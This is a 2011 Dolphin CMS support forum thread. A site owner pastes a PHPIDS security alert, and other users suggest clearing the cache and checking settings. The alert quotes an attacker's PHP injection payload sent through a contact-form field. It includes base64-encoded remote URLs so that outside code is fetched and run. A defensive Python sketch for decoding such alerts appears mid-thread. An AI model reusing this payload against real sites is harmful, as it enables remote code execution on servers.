security attack after upgrade to 7.0.5

Hi to all, I need help with the security attack.

I have both Total Security Impact settings set to -1.

Since I upgraded to D7.0.5 I get emails with this message:

Total impact: 36

Affected tags: xss, csrf, sqli, id, lfi, rfe

 

Variable: POST.author_name | Value: [php]echo(base64_decode(\"Vm9v\").php_uname().base64_decode(\"RG9v\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8=\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8=\"));;die();[/php]

Impact: 36 | Tags: xss, csrf, sqli, id, lfi, rfe

Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2

Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8

Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID: 46

Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59

Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data  Threshold: 3.49  Ratio: 3.3684210526316

 

REMOTE_ADDR: 91.204.149.250

HTTP_X_FORWARDED_FOR:

HTTP_CLIENT_IP:

SCRIPT_FILENAME: /var/www/vhosts/xxx/httpdocs/contact.php

QUERY_STRING:

REQUEST_URI: /contact.php

QUERY_STRING:

SCRIPT_NAME: /contact.php

PHP_SELF: /contact.php

 

And since yesterday (I didn't make any change to the template) my menu looks like the attached image.

Before the upgrade everything was fine...

Any help please?

index_page.png · 414.3K · 103 views
...
Quote · 16 Feb 2011
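
A triage sketch for reports like the one in the post above, added here as an example (not part of the original post, and not Dolphin or PHPIDS code): it parses the alert fields and decodes any base64_decode() literals in the flagged value, defanged, so a responder can see what the request tried to include. The sample report, host and IP are constructed placeholders, and parse_report and defang are names chosen for this example.

```python
import base64
import re

# Constructed sample in the shape of the e-mailed report; host, URL and IP are placeholders.
_B64 = base64.b64encode(b"http://example.invalid/a.txt?").decode()
SAMPLE_REPORT = f"""Total impact: 36
Affected tags: xss, csrf, sqli, id, lfi, rfe
Variable: POST.author_name | Value: [php]include(base64_decode(\\"{_B64}\\"));die();[/php]
Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
REMOTE_ADDR: 192.0.2.10
REQUEST_URI: /contact.php
"""

# base64_decode("...") with plain or backslash-escaped quotes, as in the report
B64_CALL = re.compile(r"""base64_decode\(\\?["']([A-Za-z0-9+/=]+)\\?["']\)""")

def defang(s):
    """Make decoded URLs non-clickable before they go into a ticket."""
    return s.replace("http", "hxxp").replace(".", "[.]")

def parse_report(text):
    report = {"rules": [], "decoded": [], "value": ""}
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("Total impact:"):
            report["impact"] = int(line.split(":", 1)[1])
        elif (m := re.match(r"Variable: (\S+) \| Value: (.*)", line)):
            report["variable"], report["value"] = m.group(1), m.group(2)
        elif (m := re.match(r"Description: (.*) \| Tags: (.*) \| ID: (\d+)", line)):
            report["rules"].append({"id": int(m.group(3)),
                                    "tags": m.group(2).split(", "),
                                    "description": m.group(1)})
        elif line.startswith(("REMOTE_ADDR:", "REQUEST_URI:")):
            key, val = line.split(":", 1)
            report[key] = val.strip()
    for b64 in B64_CALL.findall(report["value"]):
        try:
            decoded = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: leave it out rather than guess
            continue
        report["decoded"].append(defang(decoded))
    # include() of a decoded http URL is a remote file inclusion attempt (the "rfe" tag)
    report["remote_include"] = ("include(" in report["value"]
                                and any(d.startswith("hxxp") for d in report["decoded"]))
    return report

if __name__ == "__main__":
    print(parse_report(SAMPLE_REPORT))
```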

You have in fact cleared your cache and tmp folders?

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
Quote · 16 Feb 2011

Yes, I did that after the installation...

...
Quote · 16 Feb 2011

I'm not sure how you can get these reports if the setting is turned to OFF. Can you verify that your settings are -1 on both, because from the message, it appears you have it set to fire on a threshold 3 on your security settings?

Yes, I did that after the installation...

 

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
Quote · 17 Feb 2011

Same is happening for us too... both settings on -1... yet a security report at least 10 times a day (and the report is usually regarding my IP address). Cache and tmp folders were cleared.

Quote · 18 Feb 2011

@ DosDawg

 

Believe me, the setting has been at -1 since D7.0.0, and at every upgrade I make I check it.

Also last night, after I cleared the cache again via FTP and from the Admin, I got 3 of these mails.

Every mail is the same... I really don't know what the warning means, and why it looks like the problem is with the contact page; this is why I ask for help here...

I will try to contact an agent...

 

Thank you.

...
Quote · 19 Feb 2011
 
 